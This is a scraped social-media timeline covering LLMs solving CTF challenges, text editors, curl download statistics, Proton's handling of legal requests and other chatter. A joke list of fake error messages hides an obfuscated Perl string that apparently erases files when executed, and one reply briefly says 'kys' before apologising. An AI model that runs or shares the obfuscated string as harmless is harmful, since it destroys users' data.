RSS - private
GNUkko Sauvage (eris-ng) 
@eris@p.enes.lv
latvian, in their 25s, monogam, straight, he/him lesbian, ace-spec, slut. anarcho-monarchist. A theymab transtrender. I speak lv/en/ru but can pretend to understand other languages sometimes.
admin of this instance, don't ask for an invite unless you're a frien :3
the sadistic playful puppy you’ve been warned about.
Ionizing particles, true Ukkos, fake Erises, and Disqordians DNI
Minors: please consult with your parent(s)/guardian before following and/or interacting; and please do not interact with lewd and/or sexual content unless you are of the age of majority
Current PFP is Senjougahara Hitagi and Hanekawa Tsubasa, specifically by https://x.com/mani_ma/status/1973769856714760502
Previous PFP is Suzy, secret Undertale character only mentioned
Previous² PFP is Senjougahara Hitagi, specifically by https://www.tumblr.com/manimarough/785249534734417921
Previous³ PFP was dead Marsey
Previous⁴ PFP was A.B.A. from Guilty Gear Strive
Previous⁵ PFP was some image 40 sent me
Previous⁶ PFP was https://www.kotobukiya.co.jp/en/product/detail/p4934054034673/
Previous⁷ PFP was https://www.furaffinity.net/view/47773488/
eriscon is not happening
[GIF of Walter White saying "I won"]
Alt...
2 messages from eris "I knew you did it", and "You win 😅"
Crazy how it takes 11 whole x’s and they’re still not as good as one Wayland
...
![[?]](https://fedi.arimelody.space/files/public-009a20ad-4325-4513-9789-95c5566120c2.webp)
@shio Joe many x-11's does it take to Way by land????? None , they're to busy ???? Their screen tearing 😂😂😂😂😂😂
![[?]](https://wired.lain.com/media/1402e236310e01751ca4832ee7db192a41a9f667078bd7d1ac1b56a3d747810b.png)
![[?]](https://media.meowing.men/1770984493669_b9ddb07b49160bd45c0d238391989846b59566d0_processed.webp)
/neocat_flag_pan.png ":neocat_flag_pan:")
/neocat_flag_demiguy.png ":neocat_flag_demiguy:")
![[?]](https://pl.kotobank.ch/media/0e/db/01/0edb01eae904ffb98c075c26c6bac8b5f44a5308563c5bae16ae2ee9d365a833.blob?name=blob)
![[?]](https://media.vt.social/accounts/avatars/109/300/610/610/269/745/original/2f969b1bc06e782f.png)
There's a lot of discourse on Twitter about people using LLMs to solve CTF challenges. I used to write CTF challenges in a past life, so I threw a couple of my hardest ones at it.
We're screwed.
At least with text-file style challenges ("source code provided" etc), Claude Opus solves them quickly. For the "simpler" of the two, it just very quickly ran through the steps to solve it. For the more "ridiculous" challenge, it took a long while, and in fact as I type this it's still burning tokens "verifying" the flag even though it very obviously found the flag and it knows it (it's leetspeak and it identified that and that it's plausible). LLMs are, indeed, still completely unintelligent, because no human would waste time verifying a flag and second-guessing itself when it very obviously is correct. (Also you could just run it...)
But that doesn't matter, because it found it.
The thing is, CTF challenges aren't about inventing the next great invention or having a rare spark of genius. CTF challenges are about learning things by doing. You're supposed to enjoy the process. The whole point of a well-designed CTF challenge is that anyone, given enough time and effort and self-improvement and learning, can solve it. The goal isn't actually to get the flag, otherwise you'd just ask another team for the flag (which is against the rules of course). The goal is to get the flag by yourself. If you ask an LLM to get the flag for you, you aren't doing that.
(Continued)
...
So it's not surprising that an LLM can solve them, because it automates the process. That just takes all the fun and all the learning out of it, completely defeating the purpose.
I'm sure you could still come up with challenges that LLMs can't solve, but they would necessarily be harder, because LLMs are going to oneshot any of the "baby" starter challenges you could possibly come up with. So you either get rid of the "baby" challenges entirely (which means less experienced teams can't compete at all), or you accept that people will solve them with LLMs. But neither of those actually works.
Since CTF competitions are pretty much by definition timed, speed is an advantage. That means a team that does not use LLMs will not win, so teams must use LLMs. This applies to both new and experienced teams. But: A newbie team using LLMs will not learn. Because the whole point is learning by doing, and you're not doing anything. And so will not become experienced.
So this is going to devolve into CTFs being a battle of teams using LLMs to fight for the top spots, where everyone who doesn't want to use an LLM is excluded, and where less experienced teams stop improving and getting better, because they're outsourcing the work to LLMs and not learning as a result.
...
This is, quite frankly, the same problem LLM agents are causing in software engineering and such, just way worse. Because with CTFs, there is no "quality metric". Once you get the flag you get the flag. It doesn't matter if your approach was ridiculous or you completely misunderstood the problem or "winged it" in the worst way possible or the solver is a spaghetti ball of technical debt. It doesn't matter if Claude made a dozen reasoning errors in its chain that no human would (which it did). Every time it gets it wrong it just tries again, and it can try again orders of magnitude faster than a human, so it doesn't matter.
I don't have a solution for this. You can't ban LLMs, people will use them regardless. You could try interviewing teams one on one after the challenge to see if they actually have a coherent story and clearly did the work, but even then you could conceivably cheat using an LLM and then wait it out a bit to make the time spent plausible, study the reasoning chain, and convince someone that you did the work. It's like LLMs in academics, but much worse due to the time constraints and explicitly competitive nature of CTFs.
LLMs broke CTFs.
...
And honestly, reading the Claude output, it's just ridiculous. It clearly has no idea what it's doing and it's just pattern-matching. Once it found the flag it spent 7 pages of reasoning and four more scripts trying to verify it, and failed to actually find what went wrong. It just concluded after all that time wasted that sometimes it gets the right answer and sometimes the wrong answer and so probably the flag that looks like a flag is the flag. It can't debug its own code to find out what actually went wrong, it just decided to brute force try again a different way.
It's just a pattern-matching machine. But it turns out if you brute force pattern-match enough times in enough steps inside a reasoning loop, you eventually stumble upon the answer, even if you have no idea how.
Humans can "wing it" and pattern-match too, but it's a gamble. If you pattern-match wrong and go down the wrong path, you just wasted a bunch of time and someone else wins. Competitive CTFs are all about walking the line between going as fast as possible and being very careful so you don't have to revisit, debug, and redo a bunch of your work. LLMs completely screw that up by brute forcing the process faster than humans.
This sucks.
...
I might still do a monthly challenge or something in the future so people who want to have fun and learn can have fun and learn. That's still okay.
But CTFs as discrete competitions with winners are dead.
A CTF competition is basically gameified homework.
LLMs broke the game. Now all that's left is self study.
![[?]](https://cdn.raru.re/accounts/avatars/000/002/204/original/c2144b6d468adffc.jpg)
boost this cat when they least expect it
Alt...
A CAT YOU DIDN'T EXPECT
![[?]](https://media.worm.pink/media/c3bd953638863217f88e7ed0ac0a1373b7fd4c467ca96dc3e293ccc00fd95411.jpg)
opening up a job position for text editors , requirements:
- not gnu
- terminal based
- easily extensible . i like lua , but ill take whatever
- vi binds . not kakoune binds . vi binds .
- will be mantained in one year
nvi is an option , but im looking for others too
please boost 🔁, and send your applications
...
Older...
![[?]](https://media.outerheaven.club/media/21c82595f812bd3b1201c018c46f4ee40fbfb39379d9cad2b42f3bb43c9e8adc.png)
...
@twinspin6 breaks rule 1 .
...
...
@twinspin6 kys
...
@twinspin6 sorry i didnt mean that sorry
...
...
@twinspin6 i nevr say that but theres 3 ppl ragebaiting in my replies rn sorry 😭
...
...
@twinspin6 genuinely the one piece of software that singlehandedly generated my hate for gnu software
...
![[?]](https://media.worm.pink/media/6de71c9bd79f20b43bee1e42b26e5a0fb9e5443dd9e1a2a5d9335a7fd901163d.png)
...
![[?]](https://media.freesoftwareextremist.com/media/fb/41/86/fb41867a47d7781c91e09738a7e39fe2b360d5e5808893cd0df8059fb2244018.webp)
All I've done is make the freedom shine brighter.
...
@eris dont do this to me
...
![[?]](https://cdn.transfem.social/files/f4ff21e9-5389-468e-b0ca-de1ded635457.png)
@fiore@brain.worm.pink @eris@p.enes.lv I second GNU Emacs, or as I've taken to calling it: GNU + Emacs
...
![[?]](https://netzsphaere.xyz/media/7f6380b3f802f1fc2976ccadafa6938d5af22e34fc485eb5044157fc35f69ddb.png)
...
...
...
...
...
...
CC: @coolbean@brain.worm.pink @fiore@brain.worm.pink @snacks@netzsphaere.xyz
![[?]](https://brain.worm.pink/media/0a8fd8605297553619be46195328b282385e1493ade54f18096eafc5722d208d.png)
![[?]](https://snac.pinkro.se/rose/s/17976fea8651e4949df8765e6b3a752f.png)
both have vim bindings and especially kate is a very solid text editor which I never really had to extend at all since it did everything i needed
...
@rose requirement 2 is quite important to me unfortunately , hell even gnome-text-editor has a vi mode , but like . bweh
...
![[?]](https://media.worm.pink/media/3552960790144001762d5fe99525504c27130865daba7c705092a872b7c019e0.jpeg)
@fiore > no kakoune binds
🥀
...
@lizzie im so sorry its so confusing wdym d deletes one character 😭 that s so so wrong
...
...
...
...
...
...
...
...
...
...
@shitpostalotl @coolbean @lizzie that is not normal that is an abomination of the natural order of things .
...
@shitpostalotl @coolbean @lizzie wdym selecting a word is eb ?? thats not intuitive at all…
viw : visual mode , i for inside meaning without the surrounding delimeters, w for word . select the word . simple . vaw for including the delimeters
@fiore @coolbean @lizzie ok that's stupid. just because something isn't what you'd expect or are used to doesn't make it an abomination. you're being cucked by your familiarity. the actual abomination with kakoune is the config language. it's turing complete but everything is text expansions and shell calls.
...
@shitpostalotl @coolbean @lizzie im being silly calling it an abomination sorry i didnt make it clear , id just like to have smth familiar that makes more sense to me
...
![[?]](https://misskey-taube.s3.eu-central-1.wasabisys.com/files/b16358e0-ccbb-4bd6-8fb2-ce75e6f3dc96.png)
fighting this with nohup $executable > $logfile
RE: https://gts.q66.moe/@q66/statuses/01KK9MPA2J7WFMYDQAH666D4D0
...
...
...
![[?]](https://stereophonic.space/media/201670aec76581e2e9b0d45bde6cff64d7e8024de8e90f8c1664c9de85c49f37.jpg)
No build error. But running the code will burn your computer.
INCOMPREHENSIBLE WALL OF TEXT
You're code isn't gay enough. Add more gay.
Matching parenthesis not found
Developer lacks a PhD in category theory
Wrong indentation detected
私は実際には日本語を全く知りませんが、少なくともこれは面白いはずです
Missing %#$ in $??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see
Your enterprise subscription to Java has expired
Failed to get subsystem status for purpose Object { rejected: true, message: Error } content-script.js:104:25(Nobody is going to read this any way)
![[?]](https://files.mastodon.social/accounts/avatars/000/039/207/original/972a88b4292b90af.jpg)
#curl was download 10,467 times last year according to the Linux Foundation
😂
...
Older...
![[?]](https://files.mastodon.social/accounts/avatars/000/497/197/original/6a584b2c0d105a2a.png)
![[?]](https://media.swecyb.com/accounts/avatars/114/114/408/086/738/353/original/d60eca397a1e3c1b.png)
![[?]](https://media.mstdn.social/accounts/avatars/109/467/884/352/059/999/original/d1d9d29cc5854afd.jpg)
![[?]](https://f2.tchncs.de/accounts/avatars/000/038/900/original/8b87ba4434563c4f.jpg)
![[?]](https://media.mas.to/accounts/avatars/109/309/609/455/799/779/original/4ab8c9995a889032.jpg)
it claims to get the data from ecosyste.ms for this, but ecosyste.ms has absolutely no idea how often curl is downloaded so I'm really curious what exactly this number is.
Frankly, I don't know what a curl download means. a curl package manager install? a docker pull? a tarball download? git clone? installing an OS that bundles curl? All of those?
...
Older...
![[?]](https://media.infosec.exchange/infosec.exchange/accounts/avatars/112/217/743/229/571/177/original/75ffced5c14b6538.jpeg)
@bagder I think it's counting downloads of tarballs or zipfiles from the github release page? Something like that.
![[?]](https://toot.kif.rocks/system/accounts/avatars/000/000/056/original/d2a05c1b416a7e71.png)
@bagder click on learn more. And choosing the package source "NuGet" shows the same graph, so this is were your downloads are. Absolutely no docker pulls though.
![[?]](https://cdn.fosstodon.org/accounts/avatars/113/413/313/089/603/913/original/05ef2af6860875a2.jpg)
@bagder For comparison, my mocking library, for supporting unit testing, has around 10000 git clones/week, and its use is absolutely puny in comparison to curl. A git-clone counts as a download if the entire thing is just a set of header files, doesn't it?
Just shows how utterly disconnected from reality that number is.
![[?]](https://files.mastodon.social/accounts/avatars/000/027/805/original/9d6041bc6b59c496.jpeg)
@bagder also they refused to work with or support ecosyste.ms, I have had no input on the way they use it, download counts for projects like curl are never going to be useful
@bagder Ah - measuring as a Javascript (or similar) package. Impressively high for something that isn't.
![[?]](https://media.mstdn.social/accounts/avatars/113/863/572/877/160/120/original/7e0acf4b8c964244.png)
![[?]](https://media.mstdn.social/accounts/avatars/109/521/442/245/107/734/original/9303ae5bd9aebaa5.jpeg)
@bagder Congrats!! Your little project there is really taking off! Maybe some day soon other projects will notice and start using it. Keep it up - this "curl" thing has the potential to reach as many as 30,000 downloads next year!
![[?]](https://files.mastodon.social/accounts/avatars/114/592/654/734/019/951/original/fec47c6bf8c8a225.jpg)
@bagder Hey Daniel, this weekend I attended a computer science conference in Istanbul. I participated in two workshops, Rust Blockchain and Go Backend, where I noticed that curl was used in both to download files. You came to mind during the class, and it reminded me that we need to contribute more to curl. The curl project operates quietly, without people really noticing it.
![[?]](https://media.infosec.exchange/infosec.exchange/accounts/avatars/109/536/495/796/484/216/original/474cb93efb8c389e.jpg)
![[?]](https://files.mastodon.social/accounts/avatars/000/035/771/original/dbd4625dfc8d1170.jpg)
@bagder tl;dr but isn't that roughly the number of downloads before a quarter-to-breakfast on a weekend?
...
the idea of a trans commune sounds terrible i dont want to live with you people
![[?]](https://cdn.yourwalls.today/b629cbce8bd1c6e137a51387d60f6da541efeb09b0d138c9d04b1fe2c1d05355.png)
![[?]](https://oomfcity-images.global.ssl.fastly.net/accounts/avatars/113/749/074/941/490/308/original/845c0e22dbf82946.gif)
![[?]](https://uwu.mikkonen.com/fileserver/01SN7QFR095SVGEQY8Q8GKC85Z/attachment/original/01J8PQTNADZKZKZ8ZQEXBST2Q7.png)
![[?]](https://wii.cafe/ltning/s/avatar-1122131a322ac7a58db83a2ce72c763b.png){kind=avatar}
![[?]](https://therian.zone/files/e3b89266-7453-4d06-b06d-da70da0eddc1.webp)
Alt...
Two girls of similar height and tone, Hanakuma Chifuyu and Natsuki Karin, sit upon a snowy, rocky shore, facing toward the perspective. Chifuyu, of green eyes and pitch-black hair through double-exposure, sits upright looking direct with an expression of not an undue kindness. Karin rests her head upon Chifuyu's bag placed next to her, with hair in carmine tone of vast depths, eyes shining in the hues of a sunrise, expresses every emotion that Chifuyu doesn't. Karin is ill-equipped for the weather comparatively, yet both still have their most recognizable clothing within margin, with iconography and one-of-a-kind everyday attire.
![[?]](https://media.infosec.exchange/infosec.exchange/accounts/avatars/109/288/606/962/694/558/original/7d9f657c412f0031.jpg)
It feels like Proton are being intentionally misleading in their statements. They know that most of their customers aren't familiar with how legal process actually works, so are happy to spread half-truths.
Under US law, a US law enforcement agency (LEA) typically has to apply for a subpoena or search warrant with a US court. The court is then responsible for deciding if the legal bar for search a request has been met, then either grants or denies it.
The problem is, if a company has no real US footprint (no US corporate entity, offices, servers, etc.), then a US court typically doesn't have the jurisdiction to compel the company to hand over customer data (except in some rare circumstances). Even if the court approved the warrant anyway, it wouldn't really be legally binding.
Which is why the Mutual Legal Assistance Treaty (MLAT) exists. MLAT enables law enforcement agencies in one company to send requests for information to law enforcement agencies in another. Switzerland has such a treaty with the US. This means that the FBI can request that Swiss authorities hand over a Swiss company's data on their behalf.
Any country requesting information held by a company in a foreign jurisdiction would typically do so via MLAT. Which means from Proton's perspective, the legal request would appear to originate from their local law enforcement, not the FBI. Which they clearly understand based on their Reddit post.
Saying "we don't respond to legal requests from anywhere other than Swiss authorities" seems very intentionally worded to give the impression that the company does not cooperate with foreign law enforcement. But since it'd be the Swiss authorities handling any such requests, they'd have to comply, since as they admitted, they have to comply with local laws.
There is, however, some useful (but more nuanced) information here:
Firstly, MLAT requests are handled by local law enforcement according to local law. So if there is a difference between the law of the sending and recipient country, that might mean the MLAT request is denied. That probably doesn't mean much, because if you're on the FBI's radar, the chances are you did something that is also massively illegal in Switzerland too.
Secondly, they are 100% correct in saying that no other service provider is going to do any better. They're all beholden to local laws, and the ones that think they're not tend to get their doors blown off by SWAT like CyberBunker did. The only exception is if the company resides in a country which does not cooperate with US law enforcement (which Proton does not).
But the part that's extremely disingenuous is that the "we only respond to requests from the Swiss authorities". That statement is likely intended to imply they don't cooperate with law enforcement in any other countries, which is simply not true. Switzerland has MLAT agreements with over 30 counties.
People really need to understand that no company is going to shield you from the FBI (or any reputable law enforcement agency). They'll use misleading statements to make it sounds like they don't cooperate with law enforcement, but they do. They have to.
cddadaddadaaadaddaaadadr
...
...
![[?]](https://social.xenofem.me/media/4e987eb4-9bb1-4f86-a3b9-a047351946f7/nyx-slice-compress.jpeg)
![[?]](https://social.vlhl.dev/media/3f4cf22ff459446ae978e123b12f222d662130557a448a1158f1d81faf1cc928.jpg)
![[?]](https://files.mastodon.social/accounts/avatars/000/011/818/original/8987db323fdc065b.png)
the No ICE in Minnesota charity bundle keeps smashing its goals and now is near its new $700,000 goal with five days left!!
https://itch.io/b/3484/no-ice-in-minnesota
please keep sharing it around, tell people, buy it. you get many good games for a great cause.
the funds raised here are going to make a difference 🎉
...
![[?]](https://cdn.yourwalls.today/3171fa9ae6fffcf9e492373cd1a46e2db4d6851b88816f7e9f8ad3a328811e81.png)
except you're in a besieged city and, rather than being in charge of any of the big shit in maintaining defences etc., you've got the equally important job of doing small raids into the surrounding enemy camp for supplies
stuff this solves:
- your players can now indulge in their fantasies of being the good guy without any of the usual worldbuilding implications of busting into a populated area and murderizing everybody inside
- the evil monstrous dark lord or whatever is actually framed as a demonstrable threat (because the story starts with them literally attacking you instead of the other way around)
- you're still a small party venturing out into unknown hostile territory and slowly mapping out whatever the Actually Threatening Evil Army has built there now
- built-in plausible excuse for all sorts of high-tech loot, because the Actually Threatening Evil Army has taken stuff from their conquests all over the rest of the world up to this point so you could theoretically run into any sort of weapon
- built-in plausible excuse for mob difficulty progression, because the frontline has lots of screening low-value cannon fodder and your allies in the city have probably helped clear out a lot before you even got there, while fresher better equipped units might still be on their way
crossposting from tumblr https://riotouseaterofflesh.tumblr.com/post/810550503184400384/game-that-has-nearly-identical-mechanics-to-a, reposting here because i'll never find it again on there
![[?]](https://netzsphaere.xyz/media/161b2cc7b4cfcc17e9645f2cb5b22a9dd1411e6b7b0d40c1879629b78968c7c1.gif)
![[?]](https://upload.fluffytail.org/media/b6/85/b7/b685b7946418cbac228e9af714becc12fa753b77fc2999953c803afea58addf3.blob?name=blob)
...
![[?]](https://post.ebin.club/media/dbec41ef-b3b1-4292-a0f2-b06abb9da95c/blob)
...
...
@vaartis@pl.kotobank.ch @eris@p.enes.lv What is the reason
![[?]](https://hollow.raccoon.quest/files/b83f77d8-c01f-4ec0-bd32-2f99b80d9d4e.png)
![[?]](https://media.labyrinth.zone/media/b7e7d6f8a6617918da7aaec187289d82761979bfac36ae87c7b93ae711056c24.6D1KPFWOF8XG)
??? [SENSITIVE CONTENT]
Headphones? Why would I give head to a phone?...
![[?]](https://media.tech.lgbt/accounts/avatars/107/269/330/592/606/184/original/04916de97c98b02c.jpg)
History